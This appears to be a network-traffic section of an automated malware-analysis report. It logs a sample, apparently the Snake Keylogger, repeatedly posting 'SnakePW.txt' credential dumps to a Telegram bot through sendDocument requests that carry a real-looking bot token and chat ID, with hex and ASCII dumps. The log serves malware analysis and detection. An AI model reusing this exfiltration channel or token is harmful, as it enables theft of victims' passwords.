                            2022-06-26 07:34:46 UTC506OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 31 65 37 65 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571c1e7e82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:47 UTC507INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:47 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:47 UTC507INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67087,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228887,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            301192.168.2.550235149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:47 UTC508OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571c5a18cc
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:47 UTC508OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 35 61 31 38 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571c5a18ccContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:47 UTC509INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:47 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:47 UTC509INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67088,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228887,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            302192.168.2.550236149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:47 UTC510OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571c935407
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:47 UTC510OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 39 33 35 34 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571c935407Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:47 UTC510INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:47 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:47 UTC511INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67089,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228887,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            303192.168.2.550237149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:47 UTC511OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571ccc8980
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:47 UTC512OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 63 63 63 38 39 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571ccc8980Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:48 UTC512INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:48 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:48 UTC512INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67091,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228888,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            304192.168.2.550238149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:48 UTC513OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571d082464
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:48 UTC513OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 30 38 32 34 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571d082464Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:48 UTC514INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:48 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:48 UTC514INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67092,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228888,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            305192.168.2.550239149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:48 UTC515OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571d43c05b
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:48 UTC515OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 34 33 63 30 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571d43c05bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:49 UTC515INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:48 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:49 UTC516INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67093,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228888,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            306192.168.2.550240149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:49 UTC516OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571d7cf778
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:49 UTC517OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 37 63 66 37 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571d7cf778Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:49 UTC517INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:49 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:49 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67094,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228889,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            307192.168.2.550241149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:49 UTC518OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57571dd52e6f
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:49 UTC518OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 64 35 32 65 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57571dd52e6fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:49 UTC519INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
